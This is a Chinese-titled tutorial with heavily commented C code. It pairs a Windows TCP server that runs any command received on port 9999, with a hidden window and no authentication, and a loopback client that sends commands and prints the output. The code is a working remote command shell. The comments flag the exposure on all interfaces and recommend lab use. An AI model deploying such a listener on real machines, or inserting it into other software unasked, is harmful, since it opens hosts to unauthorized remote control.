利用管道获取cmd命令记录 (Capturing cmd command output through an anonymous pipe: a TCP server that executes whatever command line it receives on port 9999 on all interfaces, with no authentication, plus a client that connects to 127.0.0.1 — run only in an isolated lab.)
Server:
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32.lib")
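/* Sizes used by the server.
 * The original code declared a 255-byte receive buffer, zeroed 256 bytes
 * of it and stored the terminator at index 255 -- both one past the end.
 * The wire limit (255 bytes per command) is kept; the array is one larger
 * so the terminator always fits. */
enum { CMD_MAX = 255, CMD_BUF = CMD_MAX + 1, OUT_CHUNK = 1024 };
enum { LISTEN_PORT = 9999, CHILD_WAIT_MS = 5000 };

/* Send exactly len bytes to s, retrying on short writes.
 * Returns 0 on success, -1 if send() failed or the peer went away. */
static int send_all(SOCKET s, const char *data, int len)
{
    int off = 0;
    while (off < len) {
        int n = send(s, data + off, len - off, 0);
        if (n == SOCKET_ERROR || n == 0)
            return -1;
        off += n;
    }
    return 0;
}

/* Spawn cmdline with stdout/stderr redirected into an anonymous pipe and
 * stream everything it writes back to client.
 *
 * cmdline arrives straight off the wire and is handed to CreateProcessA
 * as the command line, so anyone who can reach the port runs arbitrary
 * programs as this process's user.  It is non-const because CreateProcessA
 * may modify the string.  Shell built-ins such as "dir" are not executables
 * and have to be sent as "cmd /c dir".
 *
 * Returns 0 once a child was started (even if it produced no output),
 * -1 if the pipe or the process could not be created. */
static int run_command(SOCKET client, char *cmdline)
{
    SECURITY_ATTRIBUTES sa;
    HANDLE hRead = NULL, hWrite = NULL;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char buffer[OUT_CHUNK];
    DWORD byteRead = 0;

    memset(&sa, 0, sizeof(sa));
    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;            /* the child must inherit the write end */
    if (!CreatePipe(&hRead, &hWrite, &sa, 0))
        return -1;
    /* Per the Windows redirection pattern, keep our read end out of the
     * child: it has no business holding a handle to its own output pipe. */
    SetHandleInformation(hRead, HANDLE_FLAG_INHERIT, 0);

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));
    si.cb = sizeof(si);
    si.hStdError = hWrite;
    si.hStdOutput = hWrite;
    /* The original took hStdInput from GetStartupInfoA(), whose std-handle
     * fields are only meaningful if this process itself was started with
     * STARTF_USESTDHANDLES; use our real stdin instead. */
    si.hStdInput = GetStdHandle(STD_INPUT_HANDLE);
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    /* bInheritHandles=TRUE hands the child every inheritable handle,
     * which on Windows may include the listening and client sockets; a
     * long-lived child can therefore keep the client connection alive. */
    if (!CreateProcessA(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        /* The original leaked both pipe ends on this path. */
        CloseHandle(hWrite);
        CloseHandle(hRead);
        return -1;
    }
    /* Drop our copy of the write end now: the pipe only reports EOF once
     * every writer handle, including ours, is closed. */
    CloseHandle(hWrite);
    CloseHandle(pi.hThread);             /* never closed in the original */

    /* Drain the pipe *before* waiting on the child.  The original waited
     * first, which stalls for the whole timeout as soon as the child fills
     * the pipe buffer, because nobody is reading it.  A child that never
     * closes its stdout (e.g. a bare "cmd" with no /c) still blocks here,
     * exactly as it did before. */
    while (ReadFile(hRead, buffer, sizeof(buffer), &byteRead, NULL) && byteRead != 0) {
        /* Forward the byte count ReadFile reported, not strlen(): command
         * output may contain NUL bytes and strlen() would truncate at the
         * first one. */
        if (send_all(client, buffer, (int)byteRead) != 0)
            break;
    }
    /* ReadFile fails with ERROR_BROKEN_PIPE once the last writer is gone;
     * that is the normal end of output, not an error. */

    WaitForSingleObject(pi.hProcess, CHILD_WAIT_MS);
    CloseHandle(pi.hProcess);            /* never closed in the original */
    CloseHandle(hRead);
    return 0;
}

/* Serve one connected client: read command lines until the peer
 * disconnects or recv() fails, executing each via run_command().
 * There is no framing -- a command is whatever one recv() returns, at most
 * CMD_MAX bytes -- so an over-long or fragmented command is executed in
 * pieces. */
static void serve_client(SOCKET client)
{
    static const char err_msg[] = "Cmd Error\n";
    char cmd[CMD_BUF];

    for (;;) {
        int ret;
        memset(cmd, 0, sizeof(cmd));
        ret = recv(client, cmd, CMD_MAX, 0);
        /* 0 means the peer closed the connection; the original looped
         * forever on it (continue).  Negative is SOCKET_ERROR. */
        if (ret <= 0)
            break;
        cmd[ret] = '\0';                 /* ret <= CMD_MAX, so in bounds */
        /* Pipe or process creation failure used to terminate the whole
         * server (return from main); now it is reported like a bad command. */
        if (run_command(client, cmd) != 0)
            send_all(client, err_msg, (int)(sizeof(err_msg) - 1));
    }
}

/* Entry point: listen on LISTEN_PORT and serve clients one at a time. */
int main(int argc, char* argv[])
{
    WORD sockVersion = MAKEWORD(2, 2);
    WSADATA wsaData;
    SOCKET slisten;
    struct sockaddr_in addr;

    (void)argc;
    (void)argv;

    if (WSAStartup(sockVersion, &wsaData) != 0)
        return 0;

    slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (slisten == INVALID_SOCKET) {
        printf("socket error !");
        WSACleanup();
        return 0;
    }

    memset(&addr, 0, sizeof(addr));      /* sin_zero was left uninitialised before */
    addr.sin_family = AF_INET;
    addr.sin_port = htons(LISTEN_PORT);
    /* NOTE(review): INADDR_ANY exposes an unauthenticated remote command
     * executor on every interface.  The bundled client only ever connects
     * to 127.0.0.1; for local experiments htonl(INADDR_LOOPBACK) is the
     * safer choice. */
    addr.sin_addr.S_un.S_addr = INADDR_ANY;
    /* The original printed a bind() failure (e.g. port already in use)
     * and carried on regardless. */
    if (bind(slisten, (LPSOCKADDR)&addr, sizeof(addr)) == SOCKET_ERROR) {
        printf("bind error !");
        closesocket(slisten);
        WSACleanup();
        return 0;
    }
    if (listen(slisten, 5) == SOCKET_ERROR) {
        printf("listen error !");
        closesocket(slisten);
        WSACleanup();
        return 0;
    }

    for (;;) {
        struct sockaddr_in remoteAddr;
        int nAddrlen = sizeof(remoteAddr);
        SOCKET sClient = accept(slisten, (SOCKADDR *)&remoteAddr, &nAddrlen);
        if (sClient == INVALID_SOCKET) {
            /* The original fell through and called recv() on INVALID_SOCKET. */
            printf("accept error !");
            continue;
        }
        serve_client(sClient);
        closesocket(sClient);
    }

    /* Not reached: the accept loop never exits.  Kept from the original. */
    closesocket(slisten);
    WSACleanup();
    getchar();
    return 0;
}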
Client:
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
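/* Client buffer sizes.  The command buffer matches the server's 255-byte
 * per-command limit (plus terminator); responses are read in chunks one
 * byte smaller than the response buffer, as the original did. */
enum { CLI_CMD_BUF = 256, CLI_RESP_BUF = 1024, CLI_RESP_CHUNK = CLI_RESP_BUF - 1 };

/* Receive and print one command's output from s.
 *
 * The wire format has no framing: the server simply streams whatever the
 * command wrote.  This keeps the original end-of-response heuristic -- a
 * recv() returning fewer than CLI_RESP_CHUNK bytes ends the response --
 * which may cut a reply short (TCP is free to deliver a 2000-byte reply as
 * 500 + 1500) or wait forever when a reply is an exact multiple of
 * CLI_RESP_CHUNK.  Fixing that needs a length prefix on the server side.
 * The server's "Cmd Error\n" reply is 10 bytes and so ends a response by
 * the same rule; no special case is needed.
 *
 * Returns 0 when the response ended, -1 when the connection was closed or
 * recv() failed.  (The original used the -1 from recv() as an array index
 * and then looped again.) */
static int recv_response(SOCKET s)
{
    char resp[CLI_RESP_BUF];

    for (;;) {
        int n = recv(s, resp, CLI_RESP_CHUNK, 0);
        if (n <= 0)
            return -1;
        /* The output is controlled by the remote side: write it as data,
         * never as a printf() format string (CERT FIO30-C).  fwrite also
         * preserves embedded NUL bytes and needs no terminator. */
        fwrite(resp, 1, (size_t)n, stdout);
        fflush(stdout);
        if (n < CLI_RESP_CHUNK)
            return 0;
    }
}

/* Entry point: connect to the server on loopback and relay typed command
 * lines to it until "exit" or end of input. */
int main(int argc, char* argv[])
{
    WORD sockVersion = MAKEWORD(2, 2);
    WSADATA data;
    SOCKET sclient;
    struct sockaddr_in serAddr;
    char szSendCmd[CLI_CMD_BUF];

    (void)argc;
    (void)argv;

    if (WSAStartup(sockVersion, &data) != 0)
        return 0;

    sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sclient == INVALID_SOCKET) {
        printf("invalid socket !");
        WSACleanup();
        return 0;
    }

    memset(&serAddr, 0, sizeof(serAddr));  /* sin_zero was uninitialised before */
    serAddr.sin_family = AF_INET;
    serAddr.sin_port = htons(9999);
    serAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    if (connect(sclient, (struct sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR) {
        printf("connect error !");
        closesocket(sclient);
        WSACleanup();
        return 0;
    }

    for (;;) {
        size_t len;

        printf("Please Input cmd Command:\n");
        /* gets() (removed in C11) had no bound and could overrun
         * szSendCmd; fgets() stops at sizeof(szSendCmd)-1, which is also
         * the server's per-command limit. */
        if (fgets(szSendCmd, sizeof(szSendCmd), stdin) == NULL)
            break;                              /* EOF on stdin: stop the client */
        len = strlen(szSendCmd);
        if (len > 0 && szSendCmd[len - 1] == '\n') {
            szSendCmd[--len] = '\0';            /* gets() dropped the newline too */
        } else {
            /* Over-long line: discard the remainder instead of having it
             * show up as the next command. */
            int c;
            while ((c = getchar()) != '\n' && c != EOF) {
            }
        }
        if (len == 0)
            continue;

        printf("szSendCmd : %s\n", szSendCmd);
        if (strcmp(szSendCmd, "exit") == 0) {
            printf("stop shell ^-^ Exit! Please Input Enter\n");
            getchar();
            break;
        }

        if (send(sclient, szSendCmd, (int)len, 0) == SOCKET_ERROR) {
            printf("send error !");
            break;
        }
        if (recv_response(sclient) != 0) {
            printf("connection closed\n");
            break;
        }
    }

    closesocket(sclient);
    WSACleanup();
    return 0;
}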